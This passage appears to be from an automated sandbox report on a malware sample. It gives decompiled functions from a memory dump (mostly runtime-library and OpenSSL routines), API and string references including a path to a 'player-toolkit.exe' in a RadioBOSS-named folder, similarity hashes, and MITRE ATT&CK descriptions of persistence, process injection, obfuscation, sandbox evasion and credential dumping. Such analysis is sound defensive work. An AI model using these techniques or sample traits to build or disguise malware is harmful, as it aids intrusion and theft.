							 *((intOrPtr*)(_t153 + 0x10)) = _a4;
							 *[fs:0x0] = _v20;
							_pop(_t163);
							__eflags = _v24 ^ _t169;
							return E6E52F227(_v24 ^ _t169, _t163);
						} else {
							_t140 = _v72;
							_t150 = _t148 + 1;
							_t107 = _t140;
							__eflags = _t150 - 0x1000;
							if(_t150 < 0x1000) {
								L17:
								_push(_t150);
								E6E52F268(_t140);
								goto L18;
							} else {
								_t140 =  *((intOrPtr*)(_t140 - 4));
								_t150 = _t150 + 0x23;
								__eflags = _t107 - _t140 + 0xfffffffc - 0x1f;
								if(__eflags > 0) {
									goto L20;
								} else {
									goto L17;
								}
							}
						}
					} else {
						_t142 = _v48;
						_t151 = _t147 + 1;
						_t117 = _t142;
						__eflags = _t151 - 0x1000;
						if(_t151 < 0x1000) {
							L13:
							_push(_t151);
							_t101 = E6E52F268(_t142);
							_t173 = _t173 + 8;
							goto L14;
						} else {
							_t140 =  *((intOrPtr*)(_t142 - 4));
							_t150 = _t151 + 0x23;
							__eflags = _t117 - _t140 + 0xfffffffc - 0x1f;
							if(__eflags > 0) {
								E6E53496F(_t125, _t140, _t150, _t153, __eflags);
								L20:
								E6E53496F(_t125, _t140, _t150, _t153, __eflags);
								asm("int3");
								asm("int3");
								_push(_t162);
								_t164 = _v144;
								asm("xorps xmm0, xmm0");
								_push(_t153);
								_t155 = _t140;
								 *_t155 = 0x6e6162d4;
								asm("movq [eax], xmm0");
								E6E530778(_t164 + 4, _t155 + 4);
								 *_t155 = 0x6e616320;
								 *((intOrPtr*)(_t155 + 0xc)) =  *((intOrPtr*)(_t164 + 0xc));
								 *((intOrPtr*)(_t155 + 0x10)) =  *((intOrPtr*)(_t164 + 0x10));
								return _t155;
							} else {
								goto L13;
							}
						}
					}
				} else {
					E6E52E7B2(__ecx, __ecx, _t83);
					 *[fs:0x0] = _v16;
					return _t158;
				}
			}

0x6e4f7d60
0x6e4f7d60
0x6e4f7d61
0x6e4f7d63
0x6e4f7d65
0x6e4f7d70
0x6e4f7d71
0x6e4f7d73
0x6e4f7d7a
0x6e4f7d7e
0x6e4f7d84
0x6e4f7d86
0x6e4f7d8b
0x6e4f7d90
0x6e4f7d97
0x6e4f7d9e
0x6e4f7da2
0x6e4f7da9
0x6e4f7daf
0x6e4f7db6
0x6e4f7dba
0x6e4f7dbd
0x6e4f7dc1
0x6e4f7dc4
0x6e4f7dc7
0x6e4f7dca
0x6e4f7dcd
0x6e4f7dcd
0x6e4f7dd0
0x6e4f7dd6
0x6e4f7df6
0x6e4f7dfb
0x6e4f7e00
0x6e4f7e01
0x6e4f7e02
0x6e4f7e03
0x6e4f7e04
0x6e4f7e05
0x6e4f7e06
0x6e4f7e07
0x6e4f7e08
0x6e4f7e09
0x6e4f7e0a
0x6e4f7e0b
0x6e4f7e0c
0x6e4f7e0d
0x6e4f7e0e
0x6e4f7e0f
0x6e4f7e10
0x6e4f7e11
0x6e4f7e13
0x6e4f7e15
0x6e4f7e20
0x6e4f7e21
0x6e4f7e24
0x6e4f7e29
0x6e4f7e2b
0x6e4f7e2e
0x6e4f7e30
0x6e4f7e34
0x6e4f7e3a
0x6e4f7e3c
0x6e4f7e3f
0x6e4f7e42
0x6e4f7e45
0x6e4f7e48
0x6e4f7e4c
0x6e4f7e4f
0x6e4f7e52
0x6e4f7e56
0x6e4f7e56
0x6e4f7e59
0x6e4f7e5c
0x6e4f7e75
0x6e4f7e7b
0x6e4f7e7d
0x6e4f7e80
0x6e4f7e84
0x6e4f7e8e
0x6e4f7e8f
0x6e4f7e97
0x6e4f7e9c
0x6e4f7e9f
0x6e4f7ea2
0x6e4f7e5e
0x6e4f7e5e
0x6e4f7e61
0x6e4f7e68
0x6e4f7e68
0x6e4f7ea8
0x6e4f7eab
0x6e4f7eae
0x6e4f7eb1
0x6e4f7eb8
0x6e4f7eba
0x6e4f7ebc
0x6e4f7ebe
0x6e4f7ec6
0x6e4f7ec6
0x6e4f7ed6
0x6e4f7ed9
0x6e4f7ee3
0x6e4f7eeb
0x6e4f7eef
0x6e4f7ef4
0x6e4f7ef7
0x6e4f7efa
0x6e4f7f28
0x6e4f7f28
0x6e4f7f2f
0x6e4f7f33
0x6e4f7f38
0x6e4f7f3c
0x6e4f7f41
0x6e4f7f44
0x6e4f7f4a
0x6e4f7f4d
0x6e4f7f55
0x6e4f7f5c
0x6e4f7f61
0x6e4f7f65
0x6e4f7f6a
0x6e4f7f6d
0x6e4f7f70
0x6e4f7f76
0x6e4f7f79
0x6e4f7fa3
0x6e4f7fab
0x6e4f7fb1
0x6e4f7fb4
0x6e4f7fba
0x6e4f7fc3
0x6e4f7fc7
0x6e4f7fd1
0x6e4f7f7b
0x6e4f7f7b
0x6e4f7f7e
0x6e4f7f7f
0x6e4f7f81
0x6e4f7f87
0x6e4f7f99
0x6e4f7f99
0x6e4f7f9b
0x00000000
0x6e4f7f89
0x6e4f7f89
0x6e4f7f8c
0x6e4f7f94
0x6e4f7f97
0x00000000
0x00000000
0x00000000
0x00000000
0x6e4f7f97
0x6e4f7f87
0x6e4f7efc
0x6e4f7efc
0x6e4f7eff
0x6e4f7f00
0x6e4f7f02
0x6e4f7f08
0x6e4f7f1e
0x6e4f7f1e
0x6e4f7f20
0x6e4f7f25
0x00000000
0x6e4f7f0a
0x6e4f7f0a
0x6e4f7f0d
0x6e4f7f15
0x6e4f7f18
0x6e4f7fd4
0x6e4f7fd9
0x6e4f7fd9
0x6e4f7fde
0x6e4f7fdf
0x6e4f7fe0
0x6e4f7fe1
0x6e4f7fe5
0x6e4f7fe8
0x6e4f7fe9
0x6e4f7fef
0x6e4f7ff5
0x6e4f7ffd
0x6e4f8005
0x6e4f8011
0x6e4f8016
0x6e4f801b
0x00000000
0x00000000
0x00000000
0x6e4f7f18
0x6e4f7f08
0x6e4f7dd8
0x6e4f7dda
0x6e4f7de7
0x6e4f7df3
0x6e4f7df3

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6E4F7D8B
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 6E4F7DDA

Part of subcall function 6E52E7B2: _Yarn.LIBCPMT ref: 6E52E7D1
Part of subcall function 6E52E7B2: _Yarn.LIBCPMT ref: 6E52E7F5

Strings

$zOn, xrefs: 6E4F7DCD, 6E4F7DD8
bad locale name, xrefs: 6E4F7DF6

Memory Dump Source

Source File: 00000020.00000002.463216123.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000020.00000002.463201409.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000020.00000002.463690977.000000006E616000.00000002.00020000.sdmp Download File
Associated: 00000020.00000002.463844819.000000006E686000.00000008.00020000.sdmp Download File
Associated: 00000020.00000002.463862394.000000006E688000.00000004.00020000.sdmp Download File
Associated: 00000020.00000002.463878395.000000006E68F000.00000002.00020000.sdmp Download File

Similarity

API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
String ID: $zOn$bad locale name
API String ID: 1908188788-1731680202
Opcode ID: a26841dca4d82694f5814edc90238794766dcdc19963da46c773721684c61e77
Instruction ID: 24bdd1c2a3f27d358201044944a23dff713e4c822c1671b46785b2ae1f07e607
Opcode Fuzzy Hash: a26841dca4d82694f5814edc90238794766dcdc19963da46c773721684c61e77
Instruction Fuzzy Hash: 4F119E71818B849FD721CFA9C804B87BBF8EF19614F008A6ED499C7B80D779A504CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6E532641, Relevance: 6.2, APIs: 4, Instructions: 168COMMON

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 6E532708
___AdjustPointer.LIBCMT ref: 6E53272B
___AdjustPointer.LIBCMT ref: 6E5327C7

Memory Dump Source

Source File: 00000020.00000002.463216123.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000020.00000002.463201409.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000020.00000002.463690977.000000006E616000.00000002.00020000.sdmp Download File
Associated: 00000020.00000002.463844819.000000006E686000.00000008.00020000.sdmp Download File
Associated: 00000020.00000002.463862394.000000006E688000.00000004.00020000.sdmp Download File
Associated: 00000020.00000002.463878395.000000006E68F000.00000002.00020000.sdmp Download File

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 4fe7c41174e4c06e4f5268a3a1d8804eccda5b32c46c367defc1bb01e58fe1c5
Instruction ID: 90a61060cc97d0f33417fc940f56573903554be2a2ce3b823c5191d85923e2d2
Opcode Fuzzy Hash: 4fe7c41174e4c06e4f5268a3a1d8804eccda5b32c46c367defc1bb01e58fe1c5
Instruction Fuzzy Hash: D951AC7A605A26AFEB158E95D850BBAB7E8FF84714F30882DD91187690F731EC41C7D0

Uniqueness

Uniqueness Score: -1.00%

Function 6E5507A9, Relevance: 6.1, APIs: 4, Instructions: 132fileCOMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6E550879
_free.LIBCMT ref: 6E5508A2
SetEndOfFile.KERNEL32(00000000,6E54B359,00000000,?,?,?,?,?,?,?,?,6E54B359,?,00000000), ref: 6E5508D4
GetLastError.KERNEL32(?,?,?,?,?,?,?,6E54B359,?,00000000,?,?,?,?,?), ref: 6E5508F0

Memory Dump Source

Source File: 00000020.00000002.463216123.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000020.00000002.463201409.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000020.00000002.463690977.000000006E616000.00000002.00020000.sdmp Download File
Associated: 00000020.00000002.463844819.000000006E686000.00000008.00020000.sdmp Download File
Associated: 00000020.00000002.463862394.000000006E688000.00000004.00020000.sdmp Download File
Associated: 00000020.00000002.463878395.000000006E68F000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFileLast
String ID:
API String ID: 1547350101-0
Opcode ID: bb06f0df921db4dc0f7fb596620744a299c4b400ce924b5fff28223ac67fdc4a
Instruction ID: 75574e3786509d3a4878770f310aa8f9ff9a6d6de4c49f31125cbd8230296323
Opcode Fuzzy Hash: bb06f0df921db4dc0f7fb596620744a299c4b400ce924b5fff28223ac67fdc4a
Instruction Fuzzy Hash: 04418132940605DADB419BF98C41FDE37F9AF85368F240913E924A7390FBB4DC6547A1

Uniqueness

Uniqueness Score: -1.00%

Function 6E548E3E, Relevance: 6.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

Part of subcall function 6E53D9D4: _free.LIBCMT ref: 6E53D9E2

Part of subcall function 6E54809B: WideCharToMultiByte.KERNEL32(6E53413C,00000000,00000000,?,6E53413C,00000010,6E545C5D,0000FDE9,00000000,?,900C408B,?,6E5459D6,0000FDE9,00000000,?), ref: 6E548147

GetLastError.KERNEL32 ref: 6E548EA6
__dosmaperr.LIBCMT ref: 6E548EAD
GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 6E548EEC
__dosmaperr.LIBCMT ref: 6E548EF3

Memory Dump Source

Source File: 00000020.00000002.463216123.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000020.00000002.463201409.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000020.00000002.463690977.000000006E616000.00000002.00020000.sdmp Download File
Associated: 00000020.00000002.463844819.000000006E686000.00000008.00020000.sdmp Download File
Associated: 00000020.00000002.463862394.000000006E688000.00000004.00020000.sdmp Download File
Associated: 00000020.00000002.463878395.000000006E68F000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
String ID:
API String ID: 167067550-0
Opcode ID: 0858f6b264f0df48047083adeffdadd832dbf92ea253d5667c6eb8f773aa85c6
Instruction ID: 5b24b4534e6b36447af9a6dfb69fb149c2842409d2010ca0218c67f68739ac28
Opcode Fuzzy Hash: 0858f6b264f0df48047083adeffdadd832dbf92ea253d5667c6eb8f773aa85c6
Instruction Fuzzy Hash: 5221A472614226FFD7119FE6CC808ABB7EDEF413687108919FA1497640E731EC1087E1

Uniqueness

Uniqueness Score: -1.00%

Function 6E5410D8, Relevance: 6.1, APIs: 4, Instructions: 72COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(6E53413C,6E53413C,900C408B,6E54571D,?,6E53413C,00000000,?,6E545BD7,6E53413C,?,6E53413C,6E53413C,00000010,6E53956D,00000000), ref: 6E5410DD
_free.LIBCMT ref: 6E54113A
_free.LIBCMT ref: 6E541170
SetLastError.KERNEL32(00000000,00000008,000000FF,?,6E545BD7,6E53413C,?,6E53413C,6E53413C,00000010,6E53956D,00000000,8304488B,?,?,00000000), ref: 6E54117B

Memory Dump Source

Source File: 00000020.00000002.463216123.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000020.00000002.463201409.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000020.00000002.463690977.000000006E616000.00000002.00020000.sdmp Download File
Associated: 00000020.00000002.463844819.000000006E686000.00000008.00020000.sdmp Download File
Associated: 00000020.00000002.463862394.000000006E688000.00000004.00020000.sdmp Download File
Associated: 00000020.00000002.463878395.000000006E68F000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 076d85ea018122e3cce68e90c9f2eb26c5cc19c7f06298e0eb777d34ffbb4b7e
Instruction ID: e2b2df8b1456ba894c90903f7ede8b4d3c151b7b397d2dccc5d6d03ac92445aa
Opcode Fuzzy Hash: 076d85ea018122e3cce68e90c9f2eb26c5cc19c7f06298e0eb777d34ffbb4b7e
Instruction Fuzzy Hash: DE11E772280611FADB5157FA5E84DAB36EE8BC2779B294B25F23482290DE728C1E4120

Uniqueness

Uniqueness Score: -1.00%

Function 6E54122F, Relevance: 6.1, APIs: 4, Instructions: 69COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,6E537E74,6E5342C8,6E684440,00000010,6E534479,?,6E4F6ECF,00000080,?,?,6E4F6ECF,?,instructions.pdf), ref: 6E541234
_free.LIBCMT ref: 6E541291
_free.LIBCMT ref: 6E5412C7
SetLastError.KERNEL32(00000000,00000008,000000FF,?,6E537E74,6E5342C8,6E684440,00000010,6E534479,?,6E4F6ECF,00000080,?,?,6E4F6ECF,?), ref: 6E5412D2

Memory Dump Source

Source File: 00000020.00000002.463216123.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000020.00000002.463201409.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000020.00000002.463690977.000000006E616000.00000002.00020000.sdmp Download File
Associated: 00000020.00000002.463844819.000000006E686000.00000008.00020000.sdmp Download File
Associated: 00000020.00000002.463862394.000000006E688000.00000004.00020000.sdmp Download File
Associated: 00000020.00000002.463878395.000000006E68F000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: ab507c17c64d60a3cec6cc29aeb8671e89ef6c1adf84d3ddab551046c68559d8
Instruction ID: b2664bd170c8084d730c3148f93308c6510b8cd2bb4df9a9e991af1dfd027e3f
Opcode Fuzzy Hash: ab507c17c64d60a3cec6cc29aeb8671e89ef6c1adf84d3ddab551046c68559d8
Instruction Fuzzy Hash: C911A332298611BADB415AFF5D84DAB32EE9BC37787590B24E634D22D0DB718C2E4120

Uniqueness

Uniqueness Score: -1.00%

Function 6E550E9D, Relevance: 6.0, APIs: 4, Instructions: 29COMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(6E53413C,?,00000000,00000000,6E53413C,?,6E54F574,6E53413C,00000001,6E53413C,6E53413C,?,6E5456AC,900C408A,?,6E53413C), ref: 6E550EB4
GetLastError.KERNEL32(?,6E54F574,6E53413C,00000001,6E53413C,6E53413C,?,6E5456AC,900C408A,?,6E53413C,900C408A,6E53413C,?,6E545BF8,00000010), ref: 6E550EC0

Part of subcall function 6E550E86: CloseHandle.KERNEL32(FFFFFFFE,6E550ED0,?,6E54F574,6E53413C,00000001,6E53413C,6E53413C,?,6E5456AC,900C408A,?,6E53413C,900C408A,6E53413C), ref: 6E550E96

___initconout.LIBCMT ref: 6E550ED0

Part of subcall function 6E550E48: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6E550E77,6E54F561,6E53413C,?,6E5456AC,900C408A,?,6E53413C,900C408A), ref: 6E550E5B

WriteConsoleW.KERNEL32(6E53413C,?,00000000,00000000,?,6E54F574,6E53413C,00000001,6E53413C,6E53413C,?,6E5456AC,900C408A,?,6E53413C,900C408A), ref: 6E550EE5

Memory Dump Source

Source File: 00000020.00000002.463216123.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000020.00000002.463201409.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000020.00000002.463690977.000000006E616000.00000002.00020000.sdmp Download File
Associated: 00000020.00000002.463844819.000000006E686000.00000008.00020000.sdmp Download File
Associated: 00000020.00000002.463862394.000000006E688000.00000004.00020000.sdmp Download File
Associated: 00000020.00000002.463878395.000000006E68F000.00000002.00020000.sdmp Download File

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 9a23dfff65d18c0642f48e314468401f0b20e5e1fddd80568df78ba82a931103
Instruction ID: 54336cf9c9035f3a4b2e5bba0f9577a54134d26b76c544a68e4eeb5bcb7f4be4
Opcode Fuzzy Hash: 9a23dfff65d18c0642f48e314468401f0b20e5e1fddd80568df78ba82a931103
Instruction Fuzzy Hash: 89F01C36050518BBCF521FDACC09ACE3F66EB4A3A5F204412FA1D85720D7328820DB90

Uniqueness

Uniqueness Score: -1.00%

Function 6E538C1B, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 263COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 6E538D86

Strings

-, xrefs: 6E538CB4
+, xrefs: 6E538CC1

Memory Dump Source

Source File: 00000020.00000002.463216123.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000020.00000002.463201409.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000020.00000002.463690977.000000006E616000.00000002.00020000.sdmp Download File
Associated: 00000020.00000002.463844819.000000006E686000.00000008.00020000.sdmp Download File
Associated: 00000020.00000002.463862394.000000006E688000.00000004.00020000.sdmp Download File
Associated: 00000020.00000002.463878395.000000006E68F000.00000002.00020000.sdmp Download File

Similarity

API ID: __aulldvrm
String ID: +$-
API String ID: 1302938615-2137968064
Opcode ID: b4aa05edf90911066abe3927e033c0bb56975b4a7a23237e5382d5defd6c3b60
Instruction ID: 073ecb0ea86bdf4672c7f3a208b4ec075a2fef02286f842dada4c81d864e9616
Opcode Fuzzy Hash: b4aa05edf90911066abe3927e033c0bb56975b4a7a23237e5382d5defd6c3b60
Instruction Fuzzy Hash: 3491F6709042699FDF08CEE9C8506EDBBF1EF52325F348A56E970EB2D0E33499058B52

Uniqueness

Uniqueness Score: -1.00%

Function 6E53E6F3, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON

Download Yara Rule

Strings

C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe, xrefs: 6E53E736, 6E53E73D, 6E53E773

Memory Dump Source

Source File: 00000020.00000002.463216123.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000020.00000002.463201409.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000020.00000002.463690977.000000006E616000.00000002.00020000.sdmp Download File
Associated: 00000020.00000002.463844819.000000006E686000.00000008.00020000.sdmp Download File
Associated: 00000020.00000002.463862394.000000006E688000.00000004.00020000.sdmp Download File
Associated: 00000020.00000002.463878395.000000006E68F000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe
API String ID: 0-86326114
Opcode ID: b3341fbcb675957278158fbf20efdb2903a982201100c5241eb42567a6ee5359
Instruction ID: 91f1cad69f1f095e4ba67b6fc1363a85cfb5360429cab6cf8f1bd89808a48f0e
Opcode Fuzzy Hash: b3341fbcb675957278158fbf20efdb2903a982201100c5241eb42567a6ee5359
Instruction Fuzzy Hash: 7D417E75E00365EFDB11CFDA8880DAEBBFCEB8A310F204466E50097244EB709E41CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6E587B00, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 114COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(00000000,00000000,6E5857A7,6E5857A6,00000000,00000000,00000000,00000000,75F51E30,?,00000000,6E5857A7,00000000), ref: 6E587B34

Strings

engines\e_capi.c, xrefs: 6E587B58, 6E587B79, 6E587BA5, 6E587BD9, 6E587BFF

Memory Dump Source

Source File: 00000020.00000002.463216123.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000020.00000002.463201409.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000020.00000002.463690977.000000006E616000.00000002.00020000.sdmp Download File
Associated: 00000020.00000002.463844819.000000006E686000.00000008.00020000.sdmp Download File
Associated: 00000020.00000002.463862394.000000006E688000.00000004.00020000.sdmp Download File
Associated: 00000020.00000002.463878395.000000006E68F000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharMultiWide
String ID: engines\e_capi.c
API String ID: 626452242-2638333933
Opcode ID: 7f124b117ea7e26a180f84deb463b89942b4a8265065e1f838c06ba45d49d821
Instruction ID: cc12e10cf511d8d759870e934fe4afce2919b7a6f006aa570ef949dc9e12f008
Opcode Fuzzy Hash: 7f124b117ea7e26a180f84deb463b89942b4a8265065e1f838c06ba45d49d821
Instruction Fuzzy Hash: 7931E5797983003AF75069A9BC82FA73BADDB92F59F004569F704DE3C5FA9198418260

Uniqueness

Uniqueness Score: -1.00%

Function 6E581030, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 94COMMON

Download Yara Rule

APIs

GetEnvironmentVariableW.KERNEL32(OPENSSL_ia32cap,6E68E2E0,00000030,00000000,00000000,?,00000032,6E5C4FE5,6E583655,?,?,?,6E55200B), ref: 6E581061

Strings

hn, xrefs: 6E5810E8
OPENSSL_ia32cap, xrefs: 6E581052

Memory Dump Source

Source File: 00000020.00000002.463216123.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000020.00000002.463201409.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000020.00000002.463690977.000000006E616000.00000002.00020000.sdmp Download File
Associated: 00000020.00000002.463844819.000000006E686000.00000008.00020000.sdmp Download File
Associated: 00000020.00000002.463862394.000000006E688000.00000004.00020000.sdmp Download File
Associated: 00000020.00000002.463878395.000000006E68F000.00000002.00020000.sdmp Download File

Similarity

API ID: EnvironmentVariable
String ID: OPENSSL_ia32cap$hn
API String ID: 1431749950-775463698
Opcode ID: 6ef9e64e19bc3cd65f72f25e283bc001ba41d8f70a26836e1bc77fca684500e2
Instruction ID: a898782f979dd6d3bed1a3b714086e6c8cc492388ac1d724748d3b2858a6c68d
Opcode Fuzzy Hash: 6ef9e64e19bc3cd65f72f25e283bc001ba41d8f70a26836e1bc77fca684500e2
Instruction Fuzzy Hash: 752125FAD409346BEB509AE69E457A337D0E35339EF154835E99496340E6384C4CC7B2

Uniqueness

Uniqueness Score: -1.00%

Function 6E586290, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70encryptionCOMMON

Download Yara Rule

APIs

CertGetCertificateContextProperty.CRYPT32(?,00000002,00000000,00000000), ref: 6E5862A6

Strings

engines\e_capi.c, xrefs: 6E5862B8, 6E5862E7, 6E58632C, 6E586345

Memory Dump Source

Source File: 00000020.00000002.463216123.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000020.00000002.463201409.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000020.00000002.463690977.000000006E616000.00000002.00020000.sdmp Download File
Associated: 00000020.00000002.463844819.000000006E686000.00000008.00020000.sdmp Download File
Associated: 00000020.00000002.463862394.000000006E688000.00000004.00020000.sdmp Download File
Associated: 00000020.00000002.463878395.000000006E68F000.00000002.00020000.sdmp Download File

Similarity

API ID: CertCertificateContextProperty
String ID: engines\e_capi.c
API String ID: 665277682-2638333933
Opcode ID: 5bd99b6d9ab999a4828b41189fa6a6ff794465adbbd16c92603a1a76ef86735a
Instruction ID: 55ef234eb04be5e1b2f00db607acc35f1735974fbfee60efb5f1e9bf8cc332a4
Opcode Fuzzy Hash: 5bd99b6d9ab999a4828b41189fa6a6ff794465adbbd16c92603a1a76ef86735a
Instruction Fuzzy Hash: 1411EB757603107BF721AAE5AC02F9B2BEC9B52B55F104469F705EE6C0D7A08C608691

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information.
Tactics:	Defense Evasion
Data Sources:	BIOS, MBR, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
